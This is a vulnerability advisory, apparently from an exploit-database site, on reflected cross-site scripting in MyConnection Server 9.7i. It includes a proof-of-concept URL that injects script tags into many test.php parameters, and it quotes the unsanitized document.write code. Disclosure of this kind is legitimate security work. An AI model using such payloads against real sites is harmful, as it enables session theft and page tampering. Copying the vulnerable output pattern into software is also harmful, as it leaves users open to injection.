MyConnection Server (MCS) 9.7i Cross Site Scripting

2014-07-22 / 2014-08-15
Credit: 1N3
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Author: 1N3 Website: http://treadstonesecurity.blogspot.ca Vender Website: http://www.visualware.com/ Affected Product: MyConnection Server Affected Version: 9.7i (others may also be vulnerable) ABOUT: MyConnection Server (MCS) delivers a broad range of support managed automated and user initiated self-help connection testing and monitoring services directly via the browser to any online customer/location anywhere in the world. Due to a failure to sanitize certain GET variables passed to the connection test page (usually test.php), it is possible to inject client side javascript to run in the context of the user browsing the website. Several parameters including testtype, ver, cm, map, lines, duration and others appear to be vulnerable. POC: http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script> VULNERABLE CODE: * Both voiplines and testlength are written to the end user without being properly sanitized and thus vulnerable to reflective XSS. <td valign="top" width="30%"><b>Current Settings</b> <br> <br> <b>VoIP Lines Simulated</b>: <script type="text/javascript"> document.write(voiplines); </script><br> <b>Test Length</b>: <script type="text/javascript"> document.write(testlength); </script><br> <b>Codec</b>: <script type="text/javascript"> if (codec == "g711") { document.write(nameg711); } else { document.write(nameg729); } </script><br> </td> <td align="left" width="70%"> <p align="center"> <script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top